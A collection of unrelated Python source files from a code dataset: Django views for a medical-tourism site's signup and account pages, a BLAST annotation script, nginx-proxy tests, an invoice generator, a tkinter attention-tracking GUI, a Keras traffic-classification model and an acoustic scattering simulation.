return render(request, 'landing/hospital_profile_complete.html', {'form': form})
class ChangeUsername(View):
def get(self, request):
form = UsernameForm(instance=request.user)
return render(request, 'landing/username.html', {'form': form})
def post(self, request):
form = UsernameForm(request.POST, request.user)
if form.is_valid():
form = UsernameForm(request.POST, instance=request.user)
form.save()
messages.success(
request, 'Your username was successfully updated!')
update_session_auth_hash(request, request.user)
return redirect('username')
else:
messages.error(
request, 'Username is already taken, please try another one.')
return render(request, 'landing/username.html', {'form': form})
def activate(request, uidb64, token):
try:
uid = force_text(urlsafe_base64_decode(uidb64))
user = User.objects.get(pk=uid)
except (TypeError, ValueError, OverflowError, User.DoesNotExist):
user = None
if user is not None and account_activation_token.check_token(user, token):
user.is_active = True
user.profile.email_confirmed = True
user.save()
hospital = Hospital(user=user, email=user.email,
name=user.first_name, slug=user.username).save()
login(request, user, backend='django.contrib.auth.backends.ModelBackend')
return redirect('complete_hospital_profile')
else:
return HospitalsAll.as_view()(request, message=settings.INVALID_ACTIVATION_STRING)
def account_activation_sent(request):
return render(request, 'registration/account_activation_sent.html')
def signup(request):
if request.method == 'POST':
form = SignUpForm(request.POST)
if form.is_valid():
user = form.save(commit=False)
user.is_active = False
user.save()
current_site = get_current_site(request)
subject = 'Activate Your MedTour Account'
from_email = settings.EMAIL_HOST_USER
message = render_to_string('registration/account_activation_email.html', {
'user': user,
'domain': current_site.domain,
'uid': force_text(urlsafe_base64_encode(force_bytes(user.pk))),
'token': account_activation_token.make_token(user),
})
plain_msg = strip_tags(message)
send_mail(subject, plain_msg, from_email, [
user.email], html_message=message, fail_silently=True)
response = HospitalsAll.as_view()(request, good_message=settings.EMAIL_SENT_STRING)
return response
else:
form = SignUpForm()
return render(request, 'registration/signup.html', {'form': form})
class HomeView(View):
def get(self, request, message=None, good_message=None):
doctors = None
hospital_appointments = None
try:
if request.user.hospital:
if not request.user.hospital.user.profile.city:
message = "Please add city to your profile, for better visibility on platform."
hospital = request.user.hospital
doctors = Doctor.objects.filter(hospital=hospital)
hospital_appointments = Appointment.objects.filter(
doctor__in=doctors)
form = InviteDocForm(request.POST or None)
return render(request, 'landing/home.html', {'doctors': doctors,
'happs': hospital_appointments,
'form': form,
'message': message,
'good_message': good_message
})
except Hospital.DoesNotExist:
pass
try:
if request.user.doctor:
slug = request.user.doctor.slug
doctor = Doctor.objects.get(slug=slug)
doc_appointments = Appointment.objects.filter(
doctor=doctor)
return render(request, 'landing/doc_home.html', {'happs': doc_appointments, 'message': message,
'good_message': good_message})
except Doctor.DoesNotExist:
pass
patient_appointments = Appointment.objects.filter(
patient__user=request.user) or None
return render(request, 'landing/patient_home.html', {'doctors': doctors,
'happs': hospital_appointments,
'papps': patient_appointments,
'message': message,
'good_message': good_message
})
def post(self, request, message=None, good_message=None):
form = InviteDocForm(request.POST or None)
if form.is_valid():
doctor = form.save(commit=False)
doctor.hospital = Hospital.objects.get(
slug=request.user.hospital.slug)
doctor.slug = doctor.user.username
form.save()
return redirect('home')
return render(request, 'landing/home.html', {'form': form, 'message': message,
'good_message': good_message})
# only4 testing
def test_func():
return True
class AccountOverview(View):
def get(self, request):
user = request.user
try:
google_login = user.social_auth.get(provider='google-oauth2')
except UserSocialAuth.DoesNotExist:
google_login = None
try:
twitter_login = user.social_auth.get(provider='twitter')
except UserSocialAuth.DoesNotExist:
twitter_login = None
try:
facebook_login = user.social_auth.get(provider='facebook')
except UserSocialAuth.DoesNotExist:
facebook_login = None
can_disconnect = (user.social_auth.count() >
1 or user.has_usable_password())
form = ProfileForm(instance=request.user.profile)
return render(request, 'landing/profile.html', {
'twitter_login': twitter_login,
'facebook_login': facebook_login,
'google_login': google_login,
'user': user,
'form': form,
'can_disconnect': can_disconnect
})
def post(self, request):
form = ProfileForm(request.POST, instance=request.user.profile)
if form.is_valid():
form.save()
messages.success(request, 'Your profile was successfully updated!')
return redirect('overview')
else:
messages.error(request, 'Please correct the error below.')
class PasswordChangeView(View):
def get(self, request):
if request.user.has_usable_password():
password_form = PasswordChangeForm
else:
password_form = AdminPasswordChangeForm
form = password_form(request.user)
return render(request, 'landing/password.html', {'form': form})
def post(self, request):
if request.user.has_usable_password():
password_form = PasswordChangeForm
else:
password_form = AdminPasswordChangeForm
if request.method == 'POST':
form = password_form(request.user, request.POST)
if form.is_valid():
form.save()
update_session_auth_hash(request, form.user)
messages.success(
request, 'Your password was successfully updated!')
return redirect('password')
else:
messages.error(request, 'Please correct the error below.')
else:
form = password_form(request.user)
return render(request, 'landing/password.html', {'form': form})
def load_state(request):
regions = Region.objects.all().order_by('name')
return render(request, 'hr/region_list.html', {'regions': regions})
def load_city(request):
region = request.GET.get('state')
cities = City.objects.filter(region__id=region).order_by('name')
return render(request, 'hr/city_list.html', {'cities': cities})
def autocomplete(request):
if request.is_ajax():
query = request.GET.get('search')
queryset = City.objects.filter(name__istartswith=query)
suggestions = []
for i in queryset:
if len(suggestions) < 10:
suggestions.append(i.display_name)
data = {
'list': suggestions,
}
return JsonResponse(data)
|
StarcoderdataPython
|
3202917
|
<reponame>tomasMasson/SfMNPV_genomics
#!/usr/bin/env python3
import argparse
from Bio import SearchIO
def parse_blast_result(blast_xml):
'''
This script takes a blast output file in xml format and
returns a table displaying the query id, the best hit id
and the annotation retrieved from Entrez database
'''
# Results keep protein homologue from SfMNPV 3AP2, because it
# has a standarize identifier (YP_XXX or NP_XXX)
blast_handle = SearchIO.parse(blast_xml, 'blast-xml')
results = {}
for record in blast_handle:
hits = [hit.id for hit in record]
for hit in hits:
if 'NC_009011' in hit:
pseudoname = hit.split('prot_')[1]
hit_name = pseudoname.split('.')[0]
results[record.id] = hit_name
break
else:
pseudoname = hit.split('prot_')[1]
hit_name = pseudoname.split('.')[0]
results[record.id] = hit_name
return results
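# Illustrative shape of the mapping returned above (both identifiers are made up for the example):
#   {'SfMNPV_query_001': 'YP_001036321'}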
def fetch_annotations(blast_results, ref_file):
"""
Fetch protein annotations from a reference file
for the proteome of SfMNPV 3AP2.
"""
# Store reference annotations into a dictionary
with open(ref_file, 'r') as fh:
next(fh)
references = {line.split(",")[0]: line.split(",")[1]
for line in fh}
# Create annotation using reference records
annotation = {}
for record in blast_results:
for reference in references:
if blast_results[record] == reference:
annotation[record] = references[reference]
# annotation[record] = [reference, references[reference]]
return annotation
# def fetch_annotations(blast_results):
# '''
# Fetch Entrez annotations for each hit in a BLAST search.
# '''
#
# # BLAST hits annotation retrieval from NCBI Entrez using
# # the protein identifier from SfMNPV 3AP2
# Entrez.email = '<EMAIL>lp.edu.ar'
# queries = [query for query in blast_results.values()]
# entrez_search = Entrez.efetch('protein',
# id=queries,
# rettype='gb',
# retmode='text')
# search_handle = SeqIO.parse(entrez_search, 'gb')
# queries_annotation = {}
# for record in search_handle:
# queries_annotation[record.name] = record.description
#
# # Create annotation using BLAST records (proteins) and the
# # annotations retrieved from NCBI
# annotation = {}
# for record in blast_results:
# for query in queries_annotation:
# if blast_results[record] == query:
# annotation[record] = [query, queries_annotation[query]]
# return annotation
def get_features_table(raw_annotation):
'''
Convert a raw annotation into a feature table similar
to .gtf format.
'''
# Extract gene coordinates from fasta header and creates an
# unsorted feature table
unsorted_annotation = {}
for number, record in enumerate(raw_annotation):
name = number
start = int(record.split(':')[1]) + 1
end = int(record.split(':')[2]) + 1
# annotation = ' '.join(word for word in raw_annotation[record])
annotation = raw_annotation[record]
if end > start:
strand = '+'
unsorted_annotation[name] = [start, end, strand, annotation]
else:
strand = '-'
unsorted_annotation[name] = [end, start, strand, annotation]
# Sort feature table
sorted_table = {key: value for key, value in sorted(unsorted_annotation.items(), key=lambda item: item[1])}
# Create a dictionary with common protein names
# with open(protein_names, 'r') as f:
# names = {line.split()[0]: line.split()[1] for line in f}
# Print to standard output
for index, key in enumerate(sorted_table, 1):
data = sorted_table[key]
print(f'genome_assembly\tBLASTp\tCDS\t{data[0]}\t{data[1]}\t.\t{data[2]}\t0\t{data[3]}')
def argument_parser():
'''Command line argument parser.'''
parser = argparse.ArgumentParser()
parser.add_argument('blast',
help='input BLAST results file')
parser.add_argument('ref_file',
help='Reference names file')
args = parser.parse_args()
return args.blast, args.ref_file
def main():
raw_blast, referencies = argument_parser()
blast_results = parse_blast_result(raw_blast)
raw_annot = fetch_annotations(blast_results, referencies)
get_features_table(raw_annot)
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
3282912
|
import pytest
def test_custom_conf_does_not_apply_to_unknown_vhost(docker_compose, nginxproxy):
r = nginxproxy.get("http://nginx-proxy/")
assert r.status_code == 503
assert "X-test" not in r.headers
def test_custom_conf_applies_to_web1(docker_compose, nginxproxy):
r = nginxproxy.get("http://web1.nginx-proxy.local/port")
assert r.status_code == 200
assert r.text == "answer from port 81\n"
assert "X-test" in r.headers
assert "f00" == r.headers["X-test"]
def test_custom_conf_does_not_apply_to_web2(docker_compose, nginxproxy):
r = nginxproxy.get("http://web2.nginx-proxy.local/port")
assert r.status_code == 200
assert r.text == "answer from port 82\n"
assert "X-test" not in r.headers
def test_custom_block_is_present_in_nginx_generated_conf(docker_compose, nginxproxy):
assert "include /etc/nginx/vhost.d/web1.nginx-proxy.local_location;" in nginxproxy.get_conf()
|
StarcoderdataPython
|
1623217
|
<filename>main/invoice.py
from docx import Document
import translate
class Invoice():
def __init__(self, customer, owner):
self.customer = customer
self.owner = owner
name = self.customer.data["Name"].replace(" ", "").lower()
self.file_name = "../data/temp/%d%s.docx" % (self.customer.index, name)
self.template = Document("../data/invoice_template.docx")
self.add_charges(self.customer.charges)
self.replace_key_words()
self.template.save(self.file_name)
def replace_key_words(self):
for paragraph in self.template.paragraphs:
paragraph.text = self.translate(paragraph.text)
for table in self.template.tables:
for i in range(len(table.rows)):
for cell in table.row_cells(i):
for paragraph in cell.paragraphs:
paragraph.text = self.translate(paragraph.text)
def translate(self, text):
text = translate.translate(text, self.owner.data, self.customer.data)
return text
def add_charges(self, charge_dict):
charge_table = self.template.tables[1]
charges = charge_dict.copy()
for i in range(1, len(charge_table.rows) - 1):
try:
charge = charges.pop(0)
charge_total = float(charge[0]) * float(charge[2])
charge.append(charge_total)
except IndexError:
charge = ("", "", "", "")
cells = charge_table.row_cells(i)
qty = str(charge[0])
description = charge[1]
unit_price = charge[2]
total_charge = charge[3]
if unit_price != "":
unit_price = "${:0.2f}".format(unit_price)
total_charge = "${:0.2f}".format(total_charge)
cells[0].paragraphs[0].text = qty
cells[1].paragraphs[0].text = description
cells[2].paragraphs[0].text = unit_price
cells[3].paragraphs[0].text = total_charge
final_row = charge_table.row_cells(len(charge_table.rows) - 1)
final_row[3].paragraphs[0].text = "${:0.2f}".format(self.customer.total)
|
StarcoderdataPython
|
3266200
|
import os
import cv2
import time
import tkinter as tk
from tkinter import *
from tkinter import messagebox
from tkinter.ttk import *
import PIL.Image, PIL.ImageTk
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from src.attention_calculator import AttentionCalc
class App:
""""
Create our GUI app.
"""
def __init__(self, window, window_title, statistics, video_stream, weights):
""""
Creating the GUI for the app.
:param window: tk.Tk() object.
:param window_title: String - our GUI title.
:param statistics: a Statistics object.
:param video_stream: frameProvider object.
"""
# Initialize the attention weights
self.attention_calc = AttentionCalc(weights[0], weights[1], weights[2])
# Initialize exit flag
self.exit_flag = True
# Initialize face detection flag
self.face = False
# Root configuration
self.window = window
self.window.title(window_title)
self.window.configure(bg='white')
self.window.resizable(width=False, height=False)
# Extract video source size
self.vid = video_stream
self.width = self.vid.get(cv2.CAP_PROP_FRAME_WIDTH)
self.height = self.vid.get(cv2.CAP_PROP_FRAME_HEIGHT)
# Create a canvas that can fit the above video source size
self.canvas = tk.Canvas(window, width=self.width, height=self.height)
self.canvas.grid(row=0, column=0, columnspan=2, padx=5, pady=5)
# Face detection label
self.label_text = tk.StringVar()
self.label_text.set('')
self.face_detection_label = tk.Label(self.window, textvariable=self.label_text, bg='white').grid(row=1,
column=0,
columnspan=2,
padx=5,
pady=5)
# Create progress bars, progress text, labels and text box for create_progress_bars() function
self.attention_bar = None
self.valence_bar = None
self.arousal_bar = None
self.dominance_bar = None
self.attention_text = tk.StringVar()
self.valence_text = tk.StringVar()
self.arousal_text = tk.StringVar()
self.dominance_text = tk.StringVar()
self.attention_label = None
self.valence_label = None
self.arousal_label = None
self.dominance_label = None
self.text = tk.Text(window, height=5, width=45)
# After it is called once, the update method will be automatically called every delay milliseconds
self.delay = 1
self.photo = None
self.update()
# create progress bars
self.create_progress_bars(window)
# Create graph
self.statistics = statistics
self.add_charts()
self.figure = None
self.window.protocol("WM_DELETE_WINDOW", self.on_closing)
def start(self):
""""
Start our GUI loop (Thread).
"""
self.window.mainloop()
def on_closing(self):
"""
quit from program
"""
main_path = os.path.dirname(os.getcwd())
        img_path = main_path + "\\debug_exp\\frames\\frame.jpg"
        inference_list_path = main_path + "\\debug_exp\\results\\inference_list.txt"
if messagebox.askokcancel("Quit", "Do you want to quit?"):
self.exit_flag = False
self.figure.savefig("../public/img/graph.jpg", bbox_inches='tight')
self.statistics.save_to_pdf()
try:
os.remove(img_path)
os.remove(inference_list_path)
except FileNotFoundError:
pass
self.window.destroy()
exit(0)
def snapshot(self):
""""
# Get a frame from the video source
"""
ret, frame = self.vid.get_frame()
if ret:
cv2.imwrite("frame-" + time.strftime("%d-%m-%Y-%H-%M-%S") + ".jpg", cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
def update(self):
""""
Update our video streaming.
"""
# Get a frame from the video source
try:
frame = self.vid.get_frame()
except Exception as e:
if self.exit_flag:
raise e
else:
return
if self.face:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
self.label_text.set('')
else:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
text = 'Face not detected!'
self.label_text.set(text)
self.photo = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
self.canvas.create_image(0, 0, image=self.photo, anchor=tk.NW)
self.window.after(self.delay, self.update)
def update_emotion_textbox(self, newText):
""""
With every iteration, we update our emotions in our text box.
:param: newText - our new text for update.
"""
if not self.exit_flag:
return
self.text.config(state=NORMAL)
self.text.delete('1.0', END)
self.text.insert(tk.END, newText)
self.text.config(state=DISABLED)
def create_progress_bars(self, window):
""""
Configure the progress bars and all labels.
:param: window - tk.TK() object
"""
self.attention_bar = Progressbar(window, orient=tk.HORIZONTAL,
length=300, mode='determinate', maximum=10, value=0)
self.valence_bar = Progressbar(window, orient=tk.HORIZONTAL,
length=300, mode='determinate', maximum=10, value=0)
self.arousal_bar = Progressbar(window, orient=tk.HORIZONTAL,
length=300, mode='determinate', maximum=10, value=0)
self.dominance_bar = Progressbar(window, orient=tk.HORIZONTAL,
length=300, mode='determinate', maximum=10, value=0)
self.attention_bar.grid(row=2, column=1, padx=5, pady=5)
self.valence_bar.grid(row=3, column=1, padx=5, pady=5)
self.arousal_bar.grid(row=4, column=1, padx=5, pady=5)
self.dominance_bar.grid(row=5, column=1, padx=5, pady=5)
self.attention_text.set('Attention (%0)')
self.valence_text.set('Valence (%0)')
self.arousal_text.set('Arousal (%0)')
self.dominance_text.set('Dominance (%0)')
self.attention_label = tk.Label(window, textvariable=self.attention_text, bg='white').grid(row=2, column=0,
padx=5, pady=5)
self.valence_label = tk.Label(window, textvariable=self.valence_text, bg='white').grid(row=3, column=0, padx=5,
pady=5)
self.arousal_label = tk.Label(window, textvariable=self.arousal_text, bg='white').grid(row=4, column=0, padx=5,
pady=5)
self.dominance_label = tk.Label(window, textvariable=self.dominance_text, bg='white').grid(row=5, column=0,
padx=5, pady=5)
self.text.insert(tk.END, "")
self.text.grid(row=2, column=2, rowspan=4, padx=5, pady=5)
self.text.config(state=DISABLED)
def add_charts(self):
"""
Adding attention levels chart to our gui.
"""
if not self.exit_flag:
return
self.figure = plt.Figure(figsize=(4, 4), dpi=100)
chart_type = FigureCanvasTkAgg(self.figure, self.window)
chart_type.get_tk_widget().grid(row=0, column=2, rowspan=4, padx=5, pady=5)
ax = self.figure.add_subplot(111)
ax.set_title('Attention tracking')
ax.set_ylim([0, 10])
data_frame = self.statistics.get_data_frame()
data_frame.plot(kind='line', legend=True, ax=ax)
def update_attention(self, value):
""""
Update Attention bar value.
:param: value - number.
"""
self.attention_bar['value'] = value
self.attention_text.set('Attention (%{:.2f})'.format(value * 10))
self.window.update_idletasks()
def update_valence(self, value):
""""
Update Valence bar value.
:param: value - number.
"""
self.valence_bar['value'] = value
self.valence_text.set('Valence (%{:.0f})'.format(value * 10))
self.window.update_idletasks()
def update_arousal(self, value):
""""
Update Arousal bar value.
:param: value - number.
"""
self.arousal_bar['value'] = value
self.arousal_text.set('Arousal (%{:.0f})'.format(value * 10))
self.window.update_idletasks()
def update_dominance(self, value):
""""
Update Dominance bar value.
:param: value - number.
"""
self.dominance_bar['value'] = value
self.dominance_text.set('Dominance (%{:.0f})'.format(value * 10))
self.window.update_idletasks()
def attention_bar_calc(self, results):
"""
Calculate the Attention level of the subject
:param results: the results from the ANN model
:return: the attention level
"""
return self.attention_calc.attention_calc(results)
|
StarcoderdataPython
|
1730439
|
import random
from django.contrib.gis.geos import GEOSGeometry
from django.core.management import BaseCommand
from django_dynamic_fixture import G
from fleetassignment.vehicles.models import Vehicle, VehiclePosition
class Command(BaseCommand):
help = "This command is responsible for generating fake Vehicles data"
def handle(self, *args, **options):
for plate in range(3):
for vehicle in range(random.randint(1, 50)):
_vehicle = G(Vehicle, plate_number=plate)
for position in range(random.randint(1, 10)):
lat = random.uniform(10.00, 1000.00)
lon = random.uniform(10.00, 1000.00)
G(
VehiclePosition,
vehicle=_vehicle,
lat=lat,
lon=lon,
point=GEOSGeometry(f'POINT({lat} {lon})')
)
|
StarcoderdataPython
|
1610179
|
<gh_stars>1-10
# from __future__ import absolute_import, division, print_function, unicode_literals
# Import TensorFlow and tf.keras
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
import tensorflow as tf
from tensorflow import keras
from keras import initializers
from keras import optimizers
from keras.callbacks import *
from keras.models import Sequential, load_model
from keras.layers import Conv2D, LSTM, Flatten, Dense, Activation, BatchNormalization, Dropout, Reshape, MaxPooling2D
from keras.callbacks import LearningRateScheduler, TensorBoard, ModelCheckpoint, ReduceLROnPlateau
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l1, l2
from keras.utils import multi_gpu_model
# from networks.train_plot import PlotLearning
# Helper libraries
import numpy as np
import matplotlib.pyplot as plt
import datetime
# Check the TensorFlow version
print(tf.__version__)
def mkdir(path):
    # Import the os module
    import os
    # Strip leading/trailing whitespace
    path = path.strip()
    # Strip a trailing backslash
    path = path.rstrip("\\")
    # Check whether the path already exists
    # exists -> True
    # does not exist -> False
    isExists = os.path.exists(path)
    # Act on the result
    if not isExists:
        # The directory does not exist, so create it
        # (os.makedirs creates intermediate directories as needed)
        os.makedirs(path)
        print(path + ' created successfully')
        return True
    else:
        # The directory already exists, so do not create it again
        print(path + ' directory already exists')
return False
class ParallelModelCheckpoint(ModelCheckpoint):
def __init__(self, model, filepath, monitor='val_loss', verbose=0,
save_best_only=False, save_weights_only=False,
mode='auto', period=1):
self.single_model = model
super(ParallelModelCheckpoint, self).__init__(filepath, monitor, verbose, save_best_only, save_weights_only,
mode, period)
def set_model(self, model):
super(ParallelModelCheckpoint, self).set_model(self.single_model)
class LR_Updater(Callback):
'''This callback is utilized to log learning rates every iteration (batch cycle)
it is not meant to be directly used as a callback but extended by other callbacks
ie. LR_Cycle
'''
def __init__(self, iterations):
'''
iterations = dataset size / batch size
epochs = pass through full training dataset
'''
self.epoch_iterations = iterations
self.trn_iterations = 0.
self.history = {}
def on_train_begin(self, logs={}):
self.trn_iterations = 0.
logs = logs or {}
def on_batch_end(self, batch, logs=None):
logs = logs or {}
self.trn_iterations += 1
K.set_value(self.model.optimizer.lr, self.setRate())
self.history.setdefault('lr', []).append(K.get_value(self.model.optimizer.lr))
self.history.setdefault('iterations', []).append(self.trn_iterations)
for k, v in logs.items():
self.history.setdefault(k, []).append(v)
def plot_lr(self):
plt.xlabel("iterations")
plt.ylabel("learning rate")
plt.plot(self.history['iterations'], self.history['lr'])
def plot(self, n_skip=10):
plt.xlabel("learning rate (log scale)")
plt.ylabel("loss")
plt.plot(self.history['lr'], self.history['loss'])
plt.xscale('log')
class LR_Cycle(LR_Updater):
'''This callback is utilized to implement cyclical learning rates
it is based on this pytorch implementation https://github.com/fastai/fastai/blob/master/fastai
and adopted from this keras implementation https://github.com/bckenstler/CLR
'''
def __init__(self, iterations, cycle_mult=1):
'''
iterations = dataset size / batch size
iterations = number of iterations in one annealing cycle
cycle_mult = used to increase the cycle length cycle_mult times after every cycle
for example: cycle_mult = 2 doubles the length of the cycle at the end of each cy$
'''
self.min_lr = 0
self.cycle_mult = cycle_mult
self.cycle_iterations = 0.
super().__init__(iterations)
def setRate(self):
self.cycle_iterations += 1
if self.cycle_iterations == self.epoch_iterations:
print(self.epoch_iterations, 'change')
self.cycle_iterations = 0.
self.epoch_iterations *= self.cycle_mult
cos_out = np.cos(np.pi * (self.cycle_iterations) / self.epoch_iterations) + 1
if (self.cycle_iterations % 10) == 0:
print(self.max_lr / 2 * cos_out)
# print(self.epoch_iterations)
# print(np.pi * (self.cycle_iterations) / self.epoch_iterations)
# print(self.cycle_iterations,'iters')
# print(cos_out)
# print(self.max_lr / 2 * cos_out,'begin')
return self.max_lr / 2 * cos_out
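    # Added note: setRate() above is cosine annealing, lr = max_lr/2 * (cos(pi*t/T) + 1), so the rate
    # starts at max_lr (t=0) and decays to 0 at t=T, while cycle_mult stretches T after each cycle.
    # Example with max_lr=0.001, T=100: lr(0)=0.001, lr(50)=0.0005, lr(100)=0.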
def on_train_begin(self, logs={}):
super().on_train_begin(logs={}) # changed to {} to fix plots after going from 1 to mult. lr
self.cycle_iterations = 0.
self.max_lr = K.get_value(self.model.optimizer.lr)
# HAPPY
class DFR_model:
def __init__(self, epochs=100000, batch_size=512, load_weights=True):
self.name = 'DFR'
self.model_filename = './DFR.h5'
self.num_classes = 8
self.input_shape = [28, 28, 1]
self.epochs = epochs #
self.batch_size = batch_size #
self.weight_decay = 0.0001
self.log_filepath = r'./DFR_tensorboard/'
self.conv_l1_regularizer = 0.00045#
# self.lstm_l1_regularizer = 0.0003 #
self.start_lr = 0.001 #
self.end_lr = 0.000001 #
self.patience = 50 #
self.epoch_1 = 1
self.epoch_2 = 2
self.epoch_3 = 3
self.lr_1 = 0.001
self.lr_2 = 0.001
self.lr_3 = 0.001#0.55 0.5 0.475 0.04625 0.45 0. 4375 0.4
if load_weights:
try:
self._model = load_model(self.model_filename)
print('Successfully loaded', self.name)
except (ImportError, ValueError, OSError) as e:
print(e)
print('Failed to load', self.name)
def count_params(self):
return self._model.count_params()
def build_model(self):
# self.batch_size = self.batch_size * strategy.num_replicas_in_sync
# with strategy.scope():
model = Sequential([
# # FLATTEN Finishedsparse_
Reshape((-1, 784, 1), input_shape=self.input_shape),
#
# # CONV 1 Finished
Conv2D(32, (1, 25,), padding='SAME', strides=[1, 1, ],
kernel_initializer=initializers.random_normal(stddev=0.1),
kernel_regularizer=l1(self.conv_l1_regularizer)),
# BatchNormalization(),
# Dropout(0.5),
Activation('relu'),
MaxPooling2D((1, 3), strides=(1, 3), padding='SAME'),
#
# # CONV 2 Finished
Conv2D(64, (1, 25,), padding='SAME', strides=[1, 1, ],
kernel_initializer=initializers.random_normal(stddev=0.1),
kernel_regularizer=l1(self.conv_l1_regularizer)),
# BatchNormalization(),
# Dropout(0.5),
Activation('relu'),
MaxPooling2D((1, 3), strides=(1, 3), padding='SAME'),
#
# # DENSE 1 / Dropout Finished
Flatten(),
Dense(1024, activation='relu',kernel_initializer=initializers.random_normal(stddev=0.1)),
BatchNormalization(),
Dropout(0.2),
# Dropout(0.5),
# DENSE 2 / SOFTMAX Finished
# Dense(100, activation='relu', kernel_initializer=initializers.random_normal(stddev=0.01)),
# Flatten(),
Dense(8, activation='softmax', kernel_initializer=initializers.random_normal(stddev=0.1)),
])
        adam = optimizers.Adam(lr=self.start_lr, beta_1=0.9, beta_2=0.999, )  # 7.28: increased the training step (learning rate) 10x
model.compile(optimizer=adam,
loss='categorical_crossentropy',
metrics=['accuracy'])
# sparse_
return model
def scheduler(self, epoch):
# print(epoch, '--------------------------')
if epoch <= self.epoch_1:
return self.lr_1
if epoch <= self.epoch_2:
return self.lr_2
if epoch <= self.epoch_3:
return self.lr_3
return self.lr_3
def train(self):
data_path = '/home/ailab/YI ZENG/Research/Classified/tra/DTrafficR/2_FusionedDataset/Numpy/data_norm8CLS_ALL.npy'
label_path = '/home/ailab/YI ZENG/Research/Classified/tra/DTrafficR/2_FusionedDataset/Numpy/label_norm8CLS_ALL.npy'
data = np.load(data_path)
data = data.reshape([-1, 28, 28, 1])
label_n = np.load(label_path)
        print('data shape:', data.shape)
        print('label shape:', label_n.shape)
        print(label_n[1:10])
        print("label type:", type(label_n))
x_train = data[:12417]
y_train = label_n[:12417]
x_test = data[12417:]
y_test = label_n[12417:]
        # Scale the data to the [0, 255] range
x_test = x_test * 256
self.x_test = x_test.astype(int)
x_train = x_train * 256
self.x_train = x_train.astype(int)
y_train = keras.utils.to_categorical(y_train, self.num_classes)
y_test = keras.utils.to_categorical(y_test, self.num_classes)
self.y_test = y_test.astype(int)
self.y_train = y_train.astype(int)
        # Build the model
model = self.build_model()
model.summary()
        # Create a directory for saved weights
mkdir(self.model_filename + 'date_' + datetime.datetime.now().strftime("%Y%m%d-%H%M%S"))
        # Training callbacks
change_lr = LearningRateScheduler(self.scheduler)
checkpoint = ModelCheckpoint(
self.model_filename + 'date_' + datetime.datetime.now().strftime(
"%Y%m%d-%H%M%S") + '/' + 'epoch_' + '{epoch:02d}' + '_val_acc_' + '{val_acc:.4f}' + '.h5',
monitor='val_acc',
verbose=0,
save_best_only=True,
mode='auto',
period=5)
# plot_callback = PlotLearning()
tb_cb = TensorBoard(
log_dir=self.log_filepath + 'date_' + datetime.datetime.now().strftime(
"%Y%m%d-%H%M%S") + '_conv_l1_' + str(self.conv_l1_regularizer) + '_lstm_l1_' + str(
self.conv_l1_regularizer),
histogram_freq=0)
# lr change
reduce_lr = ReduceLROnPlateau(monitor='val_acc', factor=0.5, verbose=1,
patience=self.patience, min_lr=self.end_lr)
# SGDR_lr = LR_Cycle(5000, 2)
cbks = [checkpoint, tb_cb, reduce_lr]
print('Using real-time data augmentation.')
# datagen = ImageDataGenerator(horizontal_flip=False,
# width_shift_range=0.01, height_shift_range=0.01, fill_mode='constant', cval=0.)
#
# datagen.fit(x_train)
# start traing
# model.fit_generator(datagen.flow(x_train, y_train,batch_size=self.batch_size),
# steps_per_epoch=59,
# verbose=2,
# epochs=self.epochs,
# callbacks=cbks,
# validation_data=(x_test, y_test))
        # start training
model.fit(x=self.x_train, y=self.y_train,
batch_size=self.batch_size,
epochs=self.epochs,
callbacks=cbks,
verbose=2,
validation_data=(self.x_test, self.y_test),
)
# save model
model.save(self.model_filename + '.h5')
self._model = model
def predict(self, img):
return self._model.predict(img, batch_size=self.batch_size)
def predict_one(self, img):
return self.predict(img)[0]
def accuracy(self):
return self._model.evaluate(self.x_test, self.y_test, verbose=0)[1]
if __name__ == '__main__':
DFR = DFR_model()
DFR.train()
print(DFR.accuracy())
# best (val_acc: 97): 0.003 0.001 0.000001/
# goaled: 0.01 0.0005 0.0000001/0.003 0.003 0.000001/0.01 0.005 /0.003 0.001 0.000001/0.001 0.00013 0.0001
# failed: 0.01 0.001 0.000001/
|
StarcoderdataPython
|
163987
|
<filename>novice_stakes/tests/iso_speed_KA_sin.py
import numpy as np
import numexpr as ne
from math import pi
from scipy.optimize import newton
from scipy.signal import hilbert
from scipy.special import hankel2
import matplotlib.pyplot as plt
from novice_stakes import p_sca, initialize_nuttall
from novice_stakes.refraction import IsoSpeedFan, p_sca_KA_fan, initialize_axes
from novice_stakes.periodic_scatter import CosineRs, make_theta_axis
plt.ion()
z_src = -105
z_rcr = -15
x_rcr = 460
# Sinusoid paramters
H = 2.
L = 40.
c = 1500
fc = 1e3
fs = 2.25e3 * 2
tau_lim = 40e-3
# compute time/frequency domain parameters
faxis, dx, sig_FT = initialize_nuttall(fc, fs, c, tau_lim)
# compute source and receiver ray fans
num_rays = 2000
theta_max = 0.1 * (pi / 180)
dz_iso = 5
ray_src = IsoSpeedFan(c, z_src + dz_iso, num_rays, theta_max)
ray_rcr = IsoSpeedFan(c, z_rcr + dz_iso, num_rays, theta_max)
# setup xaxis
xaxis, yaxis, tau_img = initialize_axes(ray_src, ray_rcr, tau_lim, x_rcr, dx, dz_iso=dz_iso)
# 1 and 2D surfaces
K = 2 * pi / L
eta = (H / 2) * np.cos(K * xaxis)
eta_dx = -(H * K / 2) * np.sin(K * xaxis)
# 2-D calculations
eta_2D = np.broadcast_to(eta[:, None], (xaxis.size, yaxis.size))
eta_dx_2D = np.broadcast_to(eta_dx[:, None], (xaxis.size, yaxis.size))
eta_p = np.array([eta_dx_2D, np.zeros_like(eta_dx_2D)])
# stationary phase results
p_sta_fan, t_rcr_sta, _ = p_sca_KA_fan(ray_src, ray_rcr, xaxis, x_rcr,
eta, eta_dx, tau_img, tau_lim, faxis, sig_FT,
dz_iso=dz_iso)
# line source result
kc = 2 * pi * fc / c
p_ls_fan, t_rcr_1D, p_ref = p_sca_KA_fan(ray_src, ray_rcr, xaxis, x_rcr,
eta, eta_dx,
tau_img, tau_lim, faxis, sig_FT,
kc=kc, dz_iso=dz_iso)
# 2-D result
p_2D_fan, t_rcr_2D, _ = p_sca_KA_fan(ray_src, ray_rcr, xaxis, x_rcr,
eta_2D, eta_p,
tau_img, tau_lim, faxis, sig_FT,
yaxis=yaxis, dz_iso=dz_iso)
